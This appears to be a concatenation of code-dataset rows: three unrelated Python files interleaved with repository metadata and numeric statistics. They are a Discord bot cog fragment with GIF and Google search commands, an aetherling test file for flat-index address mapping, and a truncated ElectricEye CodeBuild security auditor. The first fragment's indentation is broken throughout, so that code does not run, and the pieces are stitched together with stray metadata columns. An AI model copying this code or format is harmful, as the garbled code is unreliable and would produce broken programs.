@commands.command(help = "shuffles the results from the tenor results", aliases = ["tenor-shuffle"])
async def tenor_shuffle(self, ctx, *, args = None):
if not args:
return await self.tenor(ctx, args = "shuffle")
await self.tenor_random(ctx, args = args)
@commands.cooldown(1, 30, BucketType.user)
    @commands.group(brief = "looks up an item from giphy.", invoke_without_command = True)
async def giphy(self, ctx, *, args = None):
        if not args:
            ctx.command.reset_cooldown(ctx)
            return await ctx.send("That doesn't have any value.")
safesearch_type = AgeRating.g()
results = await self.giphy_client.search(args, rating = safesearch_type, limit = 10)
if not results:
            return await ctx.send("I got no results from giphy.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from giphy.")
gifNearest = sorted(results_media, key = lambda x: SequenceMatcher(None, x.url, args).ratio())[-1]
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"order for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="GIPHY")
embed.set_image(url = f"https://media3.giphy.com/media/{gifNearest.id}/giphy.gif")
await ctx.send(content = "Giphy has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@giphy.command(help = "looks up an item from giphy but shuffled.", name = "shuffle")
async def giphy_random(self, ctx, *, args = None):
if not args:
return await self.giphy(ctx, args = "shuffle")
safesearch_type = AgeRating.g()
results = await self.giphy_client.search(args, rating = safesearch_type, limit = 10)
if not results:
            return await ctx.send("I got no results from giphy.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from giphy.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"order for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="GIPHY")
embed.set_image(url = f"https://media3.giphy.com/media/{gifNearest.id}/giphy.gif")
await ctx.send(content = "Giphy has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(help = "looks up an item from giphy but shuffled", aliases=["giphy-shuffle"])
async def giphy_shuffle(self, ctx, *, args = None):
if not args:
return await self.giphy(ctx, args = "shuffle")
await self.giphy_random(ctx, args = args)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief = "can search a search result from google with safe search!")
async def google(self, ctx, *, args = None):
if not args:
            return await ctx.send("You can't search for nothing; you need something to look up.")
try:
results = await self.google_engine.search(args, max_results = 10, safe_search = True)
except Exception as e:
            return await ctx.send(f"An error occurred while fetching results: {e}. Please report this to the owner.")
menu = utils.GoogleEmbed(results, ctx = ctx, delete_message_after = True)
await menu.send(ctx.channel)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief = "sends a gif of someone dancing to disco (animated)")
async def disco(self, ctx):
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search("disco", content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title = "Item: disco", description = f"Random Disco Gif:", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"Random Disco Gif for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value = "Tenor")
if gifNearest.gif: embed.set_image(url= gifNearest.gif.url)
        else: embed.set_image(url="https://i.imgur.com/sLQzAiW.png")
await ctx.send(content = "Disco has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief = "sends a gif of someone dancing to all but disco(animated)")
async def dance(self, ctx):
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search("dance", content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title = "Item: dance", description = f"Random Dance Gif:", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"Random Dance Gif for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="Tenor")
if gifNearest.gif: embed.set_image(url = gifNearest.gif.url)
        else: embed.set_image(url="https://i.imgur.com/sLQzAiW.png")
await ctx.send(content = "Dance has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
def setup(bot):
bot.add_cog(Order(bot)) | 41.292553 | 171 | 0.69638 | 2,270 | 15,526 | 4.659912 | 0.098238 | 0.028928 | 0.034033 | 0.032331 | 0.849877 | 0.838533 | 0.825676 | 0.813292 | 0.812819 | 0.794006 | 0 | 0.021521 | 0.179956 | 15,526 | 376 | 172 | 41.292553 | 0.809299 | 0.0076 | 0 | 0.708502 | 0 | 0.008097 | 0.247376 | 0.009854 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008097 | false | 0.012146 | 0.02834 | 0 | 0.133603 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
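The cog above repeatedly picks the search result whose URL is most similar to the query with `sorted(..., key=lambda x: SequenceMatcher(None, x.image_url, args).ratio())[-1]`. A minimal standalone sketch of that closest-match selection (the function name and sample values here are illustrative, not from the cog):

```python
from difflib import SequenceMatcher

def closest_match(query, candidates):
    # Highest similarity ratio wins; equivalent (up to tie-breaking) to the
    # sorted(..., key=ratio)[-1] pattern used throughout the cog.
    return max(candidates, key=lambda c: SequenceMatcher(None, c, query).ratio())

print(closest_match("cat", ["dog.png", "cat.png", "car.png"]))  # cat.png
```

Since `SequenceMatcher.ratio()` compares raw character sequences, matching against a URL rather than a title is a rough heuristic; it rewards filenames that happen to contain the query text.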
b27f880675c28a2bae324963986fb8f13f8d750e | 4,468 | py | Python | tests/permutation/test_assign_ts_addresses.py | David-Durst/aetherling | 91bcf0579608ccbf7d42a7bddf90ccd4257d6571 | [
"MIT"
] | 10 | 2018-04-03T01:51:16.000Z | 2022-02-07T04:27:26.000Z | tests/permutation/test_assign_ts_addresses.py | David-Durst/aetherling | 91bcf0579608ccbf7d42a7bddf90ccd4257d6571 | [
"MIT"
] | 19 | 2018-05-20T00:43:31.000Z | 2021-03-18T20:36:52.000Z | tests/permutation/test_assign_ts_addresses.py | David-Durst/aetherling | 91bcf0579608ccbf7d42a7bddf90ccd4257d6571 | [
"MIT"
] | 1 | 2018-07-11T23:36:43.000Z | 2018-07-11T23:36:43.000Z | from aetherling.modules.permutation.assign_ts_addresses import *
def test_flat_idxs_tseq_3_0():
tseq_3_0 = ST_TSeq(3, 0, ST_Int())
flat_idxs = dimensions_to_flat_idx(tseq_3_0)
assert flat_idxs == [[FlatIndex(False, 0)],[FlatIndex(False, 1)],[FlatIndex(False, 2)]]
def test_flat_idxs_tseq_3_3():
tseq_3_0 = ST_TSeq(3, 3, ST_Int())
flat_idxs = dimensions_to_flat_idx(tseq_3_0)
assert flat_idxs == [[FlatIndex(False, 0)],[FlatIndex(False, 1)],[FlatIndex(False, 2)],
[FlatIndex(True, 0)],[FlatIndex(True, 1)],[FlatIndex(True, 2)]]
def test_flat_idxs_sseq_3():
sseq_3 = ST_SSeq(3, ST_Int())
flat_idxs = dimensions_to_flat_idx(sseq_3)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 1), FlatIndex(False, 2)]]
def test_flat_idxs_tseq_2_0_sseq_3():
vals = ST_TSeq(2, 0, ST_SSeq(3, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 1), FlatIndex(False, 2)],
[FlatIndex(False, 3), FlatIndex(False, 4), FlatIndex(False, 5)]]
def test_flat_idxs_tseq_2_1_sseq_3():
vals = ST_TSeq(2, 1, ST_SSeq(3, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 1), FlatIndex(False, 2)],
[FlatIndex(False, 3), FlatIndex(False, 4), FlatIndex(False, 5)],
[FlatIndex(True, 0), FlatIndex(True, 1), FlatIndex(True, 2)]]
def test_flat_idxs_tseq_2_0_tseq_1_1():
vals = ST_TSeq(2, 0, ST_TSeq(1, 1, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0)], [FlatIndex(True, 0)], [FlatIndex(False, 1)], [FlatIndex(True, 1)]]
def test_flat_idxs_tseq_2_2():
vals = ST_TSeq(2, 2, ST_Int())
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0)], [FlatIndex(False, 1)], [FlatIndex(True, 0)], [FlatIndex(True, 1)]]
def test_flat_idxs_sseq_3_tseq_2_1():
vals = ST_SSeq(3, ST_TSeq(2, 1, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 2), FlatIndex(False, 4)],
[FlatIndex(False, 1), FlatIndex(False, 3), FlatIndex(False, 5)],
[FlatIndex(True, 0), FlatIndex(True, 1), FlatIndex(True, 2)]]
def test_flat_idxs_tseq_2_0_sseq_3_tseq_2_0():
vals = ST_TSeq(2, 0, ST_SSeq(3, ST_TSeq(2, 0, ST_Int())))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 2), FlatIndex(False, 4)],
[FlatIndex(False, 1), FlatIndex(False, 3), FlatIndex(False, 5)],
[FlatIndex(False, 6), FlatIndex(False, 8), FlatIndex(False, 10)],
[FlatIndex(False, 7), FlatIndex(False, 9), FlatIndex(False, 11)]]
def test_input_addr_to_output_addr_flip():
input_type = ST_TSeq(3, 0, ST_SSeq(2, ST_Int()))
output_type = ST_SSeq(2, ST_TSeq(3, 0, ST_Int()))
input_non_nested_ts = dimensions_to_flat_idx(input_type)
output_non_nested_ts = dimensions_to_flat_idx(output_type)
for t in range(3):
for s in range(2):
output_addr = get_output_address_at_input(t, s, input_type, output_type)
assert input_non_nested_ts[t][s] == output_non_nested_ts[output_addr.t][output_addr.s]
def test_input_addr_to_output_addr_flip_invalids():
input_type = ST_TSeq(3, 1, ST_SSeq(2, ST_Int()))
output_type = ST_SSeq(2, ST_TSeq(3, 1, ST_Int()))
input_non_nested_ts = dimensions_to_flat_idx(input_type)
output_non_nested_ts = dimensions_to_flat_idx(output_type)
for t in range(4):
for s in range(2):
output_addr = get_output_address_at_input(t, s, input_type, output_type)
assert input_non_nested_ts[t][s] == output_non_nested_ts[output_addr.t][output_addr.s]
def test_input_to_output_addr_diff_width():
input_type = ST_TSeq(2, 2, ST_SSeq(2, ST_Int()))
output_type = ST_SSeq(4, ST_TSeq(1, 3, ST_Int()))
input_non_nested_ts = dimensions_to_flat_idx(input_type, min_port_width=2, max_port_width=4, total_time=4)
output_non_nested_ts = dimensions_to_flat_idx(output_type)
for t in range(4):
for s in range(4):
output_addr = get_output_address_at_input(t, s, input_type, output_type)
assert input_non_nested_ts[t][s] == output_non_nested_ts[output_addr.t][output_addr.s]
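For readers without the aetherling types on hand, the outermost-TSeq-over-scalar case exercised by `test_flat_idxs_tseq_3_3` can be re-derived independently: a `TSeq(n, i)` over a scalar occupies `n + i` clock cycles, emitting `n` valid elements followed by `i` invalid slots. This is a hypothetical sketch of that rule, not the library's implementation (nested types interleave, as the other tests show):

```python
from collections import namedtuple

# Stand-in for aetherling's FlatIndex(invalid, idx) pairs.
FlatIndex = namedtuple("FlatIndex", ["invalid", "idx"])

def tseq_flat_idx(n, i):
    # n valid clock cycles, then i invalid ones, one scalar per cycle.
    valid = [[FlatIndex(False, t)] for t in range(n)]
    invalid = [[FlatIndex(True, t)] for t in range(i)]
    return valid + invalid

# Matches the expectation in test_flat_idxs_tseq_3_3 above.
assert tseq_flat_idx(3, 3) == [
    [FlatIndex(False, 0)], [FlatIndex(False, 1)], [FlatIndex(False, 2)],
    [FlatIndex(True, 0)], [FlatIndex(True, 1)], [FlatIndex(True, 2)],
]
```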
| 51.953488 | 114 | 0.671441 | 716 | 4,468 | 3.807263 | 0.082402 | 0.220836 | 0.088041 | 0.104549 | 0.90022 | 0.881145 | 0.825018 | 0.803742 | 0.784666 | 0.761189 | 0 | 0.0401 | 0.190689 | 4,468 | 85 | 115 | 52.564706 | 0.713772 | 0 | 0 | 0.424658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 1 | 0.164384 | false | 0 | 0.013699 | 0 | 0.178082 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b2a5ed53de40a39f8bf3676d3ca0b4db862534b7 | 34,742 | py | Python | eeauditor/auditors/aws/AWS_CodeBuild_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/AWS_CodeBuild_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/AWS_CodeBuild_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
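The `@registry.register_check("codebuild")` decorators below file each check function under its service name so the framework can discover and run them later. A minimal, hypothetical sketch of that registry pattern (`MiniRegistry` is illustrative; the real `CheckRegister` lives in `check_register`):

```python
class MiniRegistry:
    def __init__(self):
        self.checks = {}

    def register_check(self, service):
        # Returns a decorator that records the check under its service name
        # and hands the function back unchanged.
        def decorator(func):
            self.checks.setdefault(service, []).append(func)
            return func
        return decorator

reg = MiniRegistry()

@reg.register_check("codebuild")
def example_check():
    yield {"Title": "example finding"}

print([f.__name__ for f in reg.checks["codebuild"]])  # ['example_check']
```

Because the decorator returns the function unchanged, registered checks remain ordinary generators that a runner can iterate over, yielding one finding dict at a time.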
# import boto3 clients
codebuild = boto3.client("codebuild")
# loop through all CodeBuild projects and list their attributes
def get_code_build_projects(cache):
response = cache.get("code_build_projects")
if response:
return response
project_list = codebuild.list_projects()
if project_list["projects"]:
my_projects = codebuild.batch_get_projects(names=project_list["projects"])
cache["code_build_projects"] = my_projects
return cache["code_build_projects"]
else:
return {}
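`get_code_build_projects` memoizes the `batch_get_projects` response in the shared cache dict, so the several checks below hit the CodeBuild API only once per run. The same cache-or-fetch pattern in isolation (`get_cached` and `fake_fetch` are illustrative stand-ins for the function and the boto3 calls):

```python
def get_cached(cache, key, fetch):
    # Return the cached value if present; otherwise fetch once and store it.
    response = cache.get(key)
    if response:
        return response
    cache[key] = fetch()
    return cache[key]

calls = []
def fake_fetch():
    calls.append(1)
    return {"projects": ["demo-project"]}

cache = {}
get_cached(cache, "code_build_projects", fake_fetch)
get_cached(cache, "code_build_projects", fake_fetch)
print(len(calls))  # 1 -- the second call is served from the cache
```

Note that a falsy fetched value (such as the `{}` returned when no projects exist) is never treated as cached and would be fetched again; the original helper shares that behavior.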
@registry.register_check("codebuild")
def artifact_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.1] CodeBuild projects should not have artifact encryption disabled"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project supports artifacts
artifactCheck = str(projects["artifacts"]["type"])
# skip projects without artifacts
if artifactCheck == "NO_ARTIFACTS":
continue
else:
# check if encryption for artifacts is disabled
artifactEncryptionCheck = str(projects["artifacts"]["encryptionDisabled"])
if artifactEncryptionCheck == "True":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/unencrypted-artifacts",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.1] CodeBuild projects should not have artifact encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has artifact encryption disabled. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should have artifact encryption enabled scroll down to item 8 in the Create a Build Project (Console) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/unencrypted-artifacts",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.1] CodeBuild projects should not have artifact encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has artifact encryption enabled.",
"Remediation": {
"Recommendation": {
"Text": "If your project should have artifact encryption enabled scroll down to item 8 in the Create a Build Project (Console) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def insecure_ssl_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.2] CodeBuild projects should not have insecure SSL configured"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if Insecure SSL is enabled for your Source
sourceInsecureSslCheck = str(projects["source"]["insecureSsl"])
if sourceInsecureSslCheck != "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/insecure-ssl",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.2] CodeBuild projects should not have insecure SSL configured",
"Description": "CodeBuild project "
+ buildProjectName
+ " has insecure SSL configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have insecure SSL configured refer to the Troubleshooting CodeBuild section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/troubleshooting.html#troubleshooting-self-signed-certificate",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/insecure-ssl",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.2] CodeBuild projects should not have insecure SSL configured",
"Description": "CodeBuild project "
+ buildProjectName
                + " does not have insecure SSL configured.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have insecure SSL configured refer to the Troubleshooting CodeBuild section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/troubleshooting.html#troubleshooting-self-signed-certificate",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def plaintext_env_var_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.3] CodeBuild projects should not have plaintext environment variables"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project has any env vars
envVarCheck = str(projects["environment"]["environmentVariables"])
if envVarCheck == "[]":
continue
else:
# loop through env vars
codeBuildEnvVars = projects["environment"]["environmentVariables"]
for envvar in codeBuildEnvVars:
plaintextCheck = str(envvar["type"])
# identify projects that don't use parameter store or AWS secrets manager
if plaintextCheck == "PLAINTEXT":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/plaintext-env-vars",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
"Sensitive Data Identifications",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.3] CodeBuild projects should not have plaintext environment variables",
"Description": "CodeBuild project "
+ buildProjectName
+ " contains plaintext environment variables. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not contain plaintext environment variables refer to the Buildspec File Name and Storage Location section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/plaintext-env-vars",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
"Sensitive Data Identifications",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.3] CodeBuild projects should not have plaintext environment variables",
"Description": "CodeBuild project "
+ buildProjectName
+ " does not contain plaintext environment variables.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not contain plaintext environment variables refer to the Buildspec File Name and Storage Location section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
